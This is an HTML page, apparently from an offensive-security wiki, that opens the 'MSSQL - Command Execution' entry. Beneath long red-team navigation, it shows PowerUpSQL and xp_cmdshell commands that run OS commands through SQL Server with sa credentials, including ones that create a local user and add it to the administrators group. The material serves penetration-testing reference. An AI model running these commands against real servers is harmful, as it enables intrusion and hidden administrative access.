<a href="../../cloud/aws/aws-s3-bucket/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - S3 Buckets
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-ssm/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Service - SSM
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/aws/aws-training/" class="md-nav__link">
<span class="md-ellipsis">
AWS - Training
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_2" >
<label class="md-nav__link" for="__nav_4_2" id="__nav_4_2_label" tabindex="0">
<span class="md-ellipsis">
Azure
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_4_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4_2">
<span class="md-nav__icon md-icon"></span>
Azure
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../cloud/azure/aka-ms/" class="md-nav__link">
<span class="md-ellipsis">
aka.ms Shortcuts
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-access-and-token/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Access and Tokens
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-ad-conditional-access-policy/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Conditional Access Policy
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-ad-connect/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - AD Connect and Cloud Sync
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-devices-users-sp/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - IAM
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-enumeration/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Enumerate
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-persistence/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-phishing/" class="md-nav__link">
<span class="md-ellipsis">
Azure AD - Phishing
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-requirements/" class="md-nav__link">
<span class="md-ellipsis">
Azure - Requirements
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-application-endpoint/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Application Endpoint
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-application-proxy/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Application Proxy
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-container-registry/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Container Registry
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-deployment-template/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Deployment Template
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-devops/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Azure DevOps
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-keyvault/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - KeyVault
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-microsoft-intune/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Microsoft Intune
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-office-365/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Office 365
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-runbook/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Runbook and Automation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-storage-blob/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Storage Blob
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-virtual-machine/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Virtual Machine
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-web-apps/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - Web Apps
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/azure/azure-services-web-domains/" class="md-nav__link">
<span class="md-ellipsis">
Azure Services - DNS Suffix
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_4_3" >
<label class="md-nav__link" for="__nav_4_3" id="__nav_4_3_label" tabindex="0">
<span class="md-ellipsis">
Ibm
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_4_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_4_3">
<span class="md-nav__icon md-icon"></span>
Ibm
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../cloud/ibm/ibm-cloud-databases/" class="md-nav__link">
<span class="md-ellipsis">
IBM Cloud Managed Database Services
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../cloud/ibm/ibm-cloud-object-storage/" class="md-nav__link">
<span class="md-ellipsis">
IBM Cloud Object Storage
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_5" >
<label class="md-nav__link" for="__nav_5" id="__nav_5_label" tabindex="0">
<span class="md-ellipsis">
Command control
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_5">
<span class="md-nav__icon md-icon"></span>
Command control
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../command-control/cobalt-strike-beacons/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike - Beacons
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../command-control/cobalt-strike-kits/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike - Kits
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../command-control/cobalt-strike/" class="md-nav__link">
<span class="md-ellipsis">
Cobalt Strike
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../command-control/metasploit/" class="md-nav__link">
<span class="md-ellipsis">
Metasploit
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_6" >
<label class="md-nav__link" for="__nav_6" id="__nav_6_label" tabindex="0">
<span class="md-ellipsis">
Containers
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_6_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_6">
<span class="md-nav__icon md-icon"></span>
Containers
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../containers/docker/" class="md-nav__link">
<span class="md-ellipsis">
Docker
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../containers/kubernetes/" class="md-nav__link">
<span class="md-ellipsis">
Kubernetes
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--active md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_7" checked>
<label class="md-nav__link" for="__nav_7" id="__nav_7_label" tabindex="0">
<span class="md-ellipsis">
Databases
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_7_label" aria-expanded="true">
<label class="md-nav__title" for="__nav_7">
<span class="md-nav__icon md-icon"></span>
Databases
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../mssql-audit-checks/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Audit Checks
</span>
</a>
</li>
<li class="md-nav__item md-nav__item--active">
<input class="md-nav__toggle md-toggle" type="checkbox" id="__toc">
<label class="md-nav__link md-nav__link--active" for="__toc">
<span class="md-ellipsis">
MSSQL - Command Execution
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<a href="./" class="md-nav__link md-nav__link--active">
<span class="md-ellipsis">
MSSQL - Command Execution
</span>
</a>
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#command-execution-via-xp_cmdshell" class="md-nav__link">
<span class="md-ellipsis">
Command Execution via xp_cmdshell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#extended-stored-procedure" class="md-nav__link">
<span class="md-ellipsis">
Extended Stored Procedure
</span>
</a>
<nav class="md-nav" aria-label="Extended Stored Procedure">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#add-the-extended-stored-procedure-and-list-extended-stored-procedures" class="md-nav__link">
<span class="md-ellipsis">
Add the extended stored procedure and list extended stored procedures
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#clr-assemblies" class="md-nav__link">
<span class="md-ellipsis">
CLR Assemblies
</span>
</a>
<nav class="md-nav" aria-label="CLR Assemblies">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#execute-commands-using-clr-assembly" class="md-nav__link">
<span class="md-ellipsis">
Execute commands using CLR assembly
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#manually-creating-a-clr-dll-and-importing-it" class="md-nav__link">
<span class="md-ellipsis">
Manually creating a CLR DLL and importing it
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#ole-automation" class="md-nav__link">
<span class="md-ellipsis">
OLE Automation
</span>
</a>
<nav class="md-nav" aria-label="OLE Automation">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#execute-commands-using-ole-automation-procedures" class="md-nav__link">
<span class="md-ellipsis">
Execute commands using OLE automation procedures
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#agent-jobs" class="md-nav__link">
<span class="md-ellipsis">
Agent Jobs
</span>
</a>
<nav class="md-nav" aria-label="Agent Jobs">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#execute-commands-through-sql-agent-job-service" class="md-nav__link">
<span class="md-ellipsis">
Execute commands through SQL Agent Job service
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#list-all-jobs" class="md-nav__link">
<span class="md-ellipsis">
List All Jobs
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#external-scripts" class="md-nav__link">
<span class="md-ellipsis">
External Scripts
</span>
</a>
<nav class="md-nav" aria-label="External Scripts">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#python" class="md-nav__link">
<span class="md-ellipsis">
Python
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#r" class="md-nav__link">
<span class="md-ellipsis">
R
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="../mssql-credentials/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Credentials
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../mssql-enumeration/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Database Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../mssql-linked-database/" class="md-nav__link">
<span class="md-ellipsis">
MSSQL - Linked Database
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_8" >
<label class="md-nav__link" for="__nav_8" id="__nav_8_label" tabindex="0">
<span class="md-ellipsis">
Devops
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_8_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_8">
<span class="md-nav__icon md-icon"></span>
Devops
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../devops/" class="md-nav__link">
<span class="md-ellipsis">
CI/CD attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../devops/azure-devops/" class="md-nav__link">
<span class="md-ellipsis">
Azure DevOps
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../devops/buildkite/" class="md-nav__link">
<span class="md-ellipsis">
BuildKite
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../devops/circle-ci/" class="md-nav__link">
<span class="md-ellipsis">
CircleCI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../devops/drone-ci/" class="md-nav__link">
<span class="md-ellipsis">
Drone CI
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../devops/github-actions/" class="md-nav__link">
<span class="md-ellipsis">
GitHub Actions
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_9" >
<label class="md-nav__link" for="__nav_9" id="__nav_9_label" tabindex="0">
<span class="md-ellipsis">
Methodology
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_9_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_9">
<span class="md-nav__icon md-icon"></span>
Methodology
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../methodology/android-applications/" class="md-nav__link">
<span class="md-ellipsis">
Android Application
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../methodology/bug-hunting-methodology/" class="md-nav__link">
<span class="md-ellipsis">
Bug Hunting Methodology
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../methodology/source-code-analysis/" class="md-nav__link">
<span class="md-ellipsis">
Source Code Analysis
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../methodology/vulnerability-reports/" class="md-nav__link">
<span class="md-ellipsis">
Vulnerability Reports
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10" >
<label class="md-nav__link" for="__nav_10" id="__nav_10_label" tabindex="0">
<span class="md-ellipsis">
Redteam
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="1" aria-labelledby="__nav_10_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10">
<span class="md-nav__icon md-icon"></span>
Redteam
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_1" >
<label class="md-nav__link" for="__nav_10_1" id="__nav_10_1_label" tabindex="0">
<span class="md-ellipsis">
Access
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_1_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10_1">
<span class="md-nav__icon md-icon"></span>
Access
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../redteam/access/attack-surface-enumeration/" class="md-nav__link">
<span class="md-ellipsis">
Subdomains Enumeration
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/access/html-smuggling/" class="md-nav__link">
<span class="md-ellipsis">
HTML Smuggling
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/access/initial-access/" class="md-nav__link">
<span class="md-ellipsis">
Initial Access
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/access/office-attacks/" class="md-nav__link">
<span class="md-ellipsis">
Office - Attacks
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/access/phishing/" class="md-nav__link">
<span class="md-ellipsis">
Phishing
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/access/windows-download-execute/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Download and execute methods
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/access/windows-using-credentials/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Using credentials
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_2" >
<label class="md-nav__link" for="__nav_10_2" id="__nav_10_2_label" tabindex="0">
<span class="md-ellipsis">
Escalation
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_2_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10_2">
<span class="md-nav__icon md-icon"></span>
Escalation
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../redteam/escalation/linux-privilege-escalation/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Privilege Escalation
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/escalation/windows-privilege-escalation/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Privilege Escalation
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_3" >
<label class="md-nav__link" for="__nav_10_3" id="__nav_10_3_label" tabindex="0">
<span class="md-ellipsis">
Evasion
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_3_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10_3">
<span class="md-nav__icon md-icon"></span>
Evasion
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../redteam/evasion/edr-bypass/" class="md-nav__link">
<span class="md-ellipsis">
Endpoint Detection and Response
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/evasion/elastic-edr/" class="md-nav__link">
<span class="md-ellipsis">
Elastic EDR
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/evasion/linux-evasion/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Evasion
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/evasion/windows-amsi-bypass/" class="md-nav__link">
<span class="md-ellipsis">
Windows - AMSI Bypass
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/evasion/windows-defenses/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Defenses
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/evasion/windows-dpapi/" class="md-nav__link">
<span class="md-ellipsis">
Windows - DPAPI
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_4" >
<label class="md-nav__link" for="__nav_10_4" id="__nav_10_4_label" tabindex="0">
<span class="md-ellipsis">
Persistence
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_4_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10_4">
<span class="md-nav__icon md-icon"></span>
Persistence
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../redteam/persistence/linux-persistence/" class="md-nav__link">
<span class="md-ellipsis">
Linux - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/persistence/rdp-persistence/" class="md-nav__link">
<span class="md-ellipsis">
RDP - Persistence
</span>
</a>
</li>
<li class="md-nav__item">
<a href="../../redteam/persistence/windows-persistence/" class="md-nav__link">
<span class="md-ellipsis">
Windows - Persistence
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item md-nav__item--nested">
<input class="md-nav__toggle md-toggle " type="checkbox" id="__nav_10_5" >
<label class="md-nav__link" for="__nav_10_5" id="__nav_10_5_label" tabindex="0">
<span class="md-ellipsis">
Pivoting
</span>
<span class="md-nav__icon md-icon"></span>
</label>
<nav class="md-nav" data-md-level="2" aria-labelledby="__nav_10_5_label" aria-expanded="false">
<label class="md-nav__title" for="__nav_10_5">
<span class="md-nav__icon md-icon"></span>
Pivoting
</label>
<ul class="md-nav__list" data-md-scrollfix>
<li class="md-nav__item">
<a href="../../redteam/pivoting/network-pivoting-techniques/" class="md-nav__link">
<span class="md-ellipsis">
Network Pivoting Techniques
</span>
</a>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-sidebar md-sidebar--secondary" data-md-component="sidebar" data-md-type="toc" >
<div class="md-sidebar__scrollwrap">
<div class="md-sidebar__inner">
<nav class="md-nav md-nav--secondary" aria-label="Table of contents">
<label class="md-nav__title" for="__toc">
<span class="md-nav__icon md-icon"></span>
Table of contents
</label>
<ul class="md-nav__list" data-md-component="toc" data-md-scrollfix>
<li class="md-nav__item">
<a href="#summary" class="md-nav__link">
<span class="md-ellipsis">
Summary
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#command-execution-via-xp_cmdshell" class="md-nav__link">
<span class="md-ellipsis">
Command Execution via xp_cmdshell
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#extended-stored-procedure" class="md-nav__link">
<span class="md-ellipsis">
Extended Stored Procedure
</span>
</a>
<nav class="md-nav" aria-label="Extended Stored Procedure">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#add-the-extended-stored-procedure-and-list-extended-stored-procedures" class="md-nav__link">
<span class="md-ellipsis">
Add the extended stored procedure and list extended stored procedures
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#clr-assemblies" class="md-nav__link">
<span class="md-ellipsis">
CLR Assemblies
</span>
</a>
<nav class="md-nav" aria-label="CLR Assemblies">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#execute-commands-using-clr-assembly" class="md-nav__link">
<span class="md-ellipsis">
Execute commands using CLR assembly
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#manually-creating-a-clr-dll-and-importing-it" class="md-nav__link">
<span class="md-ellipsis">
Manually creating a CLR DLL and importing it
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#ole-automation" class="md-nav__link">
<span class="md-ellipsis">
OLE Automation
</span>
</a>
<nav class="md-nav" aria-label="OLE Automation">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#execute-commands-using-ole-automation-procedures" class="md-nav__link">
<span class="md-ellipsis">
Execute commands using OLE automation procedures
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#agent-jobs" class="md-nav__link">
<span class="md-ellipsis">
Agent Jobs
</span>
</a>
<nav class="md-nav" aria-label="Agent Jobs">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#execute-commands-through-sql-agent-job-service" class="md-nav__link">
<span class="md-ellipsis">
Execute commands through SQL Agent Job service
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#list-all-jobs" class="md-nav__link">
<span class="md-ellipsis">
List All Jobs
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#external-scripts" class="md-nav__link">
<span class="md-ellipsis">
External Scripts
</span>
</a>
<nav class="md-nav" aria-label="External Scripts">
<ul class="md-nav__list">
<li class="md-nav__item">
<a href="#python" class="md-nav__link">
<span class="md-ellipsis">
Python
</span>
</a>
</li>
<li class="md-nav__item">
<a href="#r" class="md-nav__link">
<span class="md-ellipsis">
R
</span>
</a>
</li>
</ul>
</nav>
</li>
<li class="md-nav__item">
<a href="#references" class="md-nav__link">
<span class="md-ellipsis">
References
</span>
</a>
</li>
</ul>
</nav>
</div>
</div>
</div>
<div class="md-content" data-md-component="content">
<article class="md-content__inner md-typeset">
<a href="https://github.com/swisskyrepo/InternalAllTheThings/blob/main/docs/databases/mssql-command-execution.md" title="Edit this page" class="md-content__button md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M10 20H6V4h7v5h5v3.1l2-2V8l-6-6H6c-1.1 0-2 .9-2 2v16c0 1.1.9 2 2 2h4zm10.2-7c.1 0 .3.1.4.2l1.3 1.3c.2.2.2.6 0 .8l-1 1-2.1-2.1 1-1c.1-.1.2-.2.4-.2m0 3.9L14.1 23H12v-2.1l6.1-6.1z"/></svg>
</a>
<a href="https://github.com/swisskyrepo/InternalAllTheThings/raw/main/docs/databases/mssql-command-execution.md" title="View source of this page" class="md-content__button md-icon">
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path d="M17 18c.56 0 1 .44 1 1s-.44 1-1 1-1-.44-1-1 .44-1 1-1m0-3c-2.73 0-5.06 1.66-6 4 .94 2.34 3.27 4 6 4s5.06-1.66 6-4c-.94-2.34-3.27-4-6-4m0 6.5a2.5 2.5 0 0 1-2.5-2.5 2.5 2.5 0 0 1 2.5-2.5 2.5 2.5 0 0 1 2.5 2.5 2.5 2.5 0 0 1-2.5 2.5M9.27 20H6V4h7v5h5v4.07c.7.08 1.36.25 2 .49V8l-6-6H6a2 2 0 0 0-2 2v16a2 2 0 0 0 2 2h4.5a8.2 8.2 0 0 1-1.23-2"/></svg>
</a>
<h1 id="mssql-command-execution">MSSQL - Command Execution</h1>
<h2 id="summary">Summary</h2>
<ul>
<li><a href="#command-execution-via-xp_cmdshell">Command Execution via xp_cmdshell</a></li>
<li><a href="#extended-stored-procedure">Extended Stored Procedure</a><ul>
<li><a href="#add-the-extended-stored-procedure-and-list-extended-stored-procedures">Add the extended stored procedure and list extended stored procedures</a></li>
</ul>
</li>
<li><a href="#clr-assemblies">CLR Assemblies</a><ul>
<li><a href="#execute-commands-using-clr-assembly">Execute commands using CLR assembly</a></li>
<li><a href="#manually-creating-a-clr-dll-and-importing-it">Manually creating a CLR DLL and importing it</a></li>
</ul>
</li>
<li><a href="#ole-automation">OLE Automation</a><ul>
<li><a href="#execute-commands-using-ole-automation-procedures">Execute commands using OLE automation procedures</a></li>
</ul>
</li>
<li><a href="#agent-jobs">Agent Jobs</a><ul>
<li><a href="#execute-commands-through-sql-agent-job-service">Execute commands through SQL Agent Job service</a></li>
<li><a href="#list-all-jobs">List All Jobs</a></li>
</ul>
</li>
<li><a href="#external-scripts">External Scripts</a><ul>
<li><a href="#python">Python</a></li>
<li><a href="#r">R</a></li>
</ul>
</li>
</ul>
<h2 id="command-execution-via-xp_cmdshell">Command Execution via xp_cmdshell</h2>
<blockquote>
<p>xp_cmdshell disabled by default since SQL Server 2005</p>
</blockquote>
<div class="highlight"><pre><span></span><code><a id="__codelineno-0-1" name="__codelineno-0-1" href="#__codelineno-0-1"></a><span class="n">PowerUpSQL</span><span class="p">&gt;</span> <span class="nb">Invoke-SQLOSCmd</span> <span class="n">-Username</span> <span class="n">sa</span> <span class="n">-Password</span> <span class="n">Password1234</span> <span class="n">-Instance</span> <span class="s2">&quot;&lt;DBSERVERNAME\DBInstance&gt;&quot;</span> <span class="n">-Command</span> <span class="n">whoami</span>
<a id="__codelineno-0-2" name="__codelineno-0-2" href="#__codelineno-0-2"></a>
<a id="__codelineno-0-3" name="__codelineno-0-3" href="#__codelineno-0-3"></a><span class="c"># Creates and adds local user backup to the local administrators group:</span>
<a id="__codelineno-0-4" name="__codelineno-0-4" href="#__codelineno-0-4"></a><span class="n">PowerUpSQL</span><span class="p">&gt;</span> <span class="nb">Invoke-SQLOSCmd</span> <span class="n">-Username</span> <span class="n">sa</span> <span class="n">-Password</span> <span class="n">Password1234</span> <span class="n">-Instance</span> <span class="s2">&quot;&lt;DBSERVERNAME\DBInstance&gt;&quot;</span> <span class="n">-Command</span> <span class="s2">&quot;net user backup Password1234 /add&#39;&quot;</span> <span class="n">-Verbose</span>
<a id="__codelineno-0-5" name="__codelineno-0-5" href="#__codelineno-0-5"></a><span class="n">PowerUpSQL</span><span class="p">&gt;</span> <span class="nb">Invoke-SQLOSCmd</span> <span class="n">-Username</span> <span class="n">sa</span> <span class="n">-Password</span> <span class="n">Password1234</span> <span class="n">-Instance</span> <span class="s2">&quot;&lt;DBSERVERNAME\DBInstance&gt;&quot;</span> <span class="n">-Command</span> <span class="s2">&quot;net localgroup administrators backup /add&quot;</span> <span class="n">-Verbose</span>
</code></pre></div>
<ul>
<li>Manually execute the SQL query
<div class="highlight"><pre><span></span><code><a id="__codelineno-1-1" name="__codelineno-1-1" href="#__codelineno-1-1"></a><span class="k">EXEC</span><span class="w"> </span><span class="n">xp_cmdshell</span><span class="w"> </span><span class="ss">&quot;net user&quot;</span><span class="p">;</span>
<a id="__codelineno-1-2" name="__codelineno-1-2" href="#__codelineno-1-2"></a><span class="k">EXEC</span><span class="w"> </span><span class="n">master</span><span class="p">..</span><span class="n">xp_cmdshell</span><span class="w"> </span><span class="s1">&#39;whoami&#39;</span>
<a id="__codelineno-1-3" name="__codelineno-1-3" href="#__codelineno-1-3"></a><span class="k">EXEC</span><span class="w"> </span><span class="n">master</span><span class="p">.</span><span class="n">dbo</span><span class="p">.</span><span class="n">xp_cmdshell</span><span class="w"> </span><span class="s1">&#39;cmd.exe dir c:&#39;</span><span class="p">;</span>
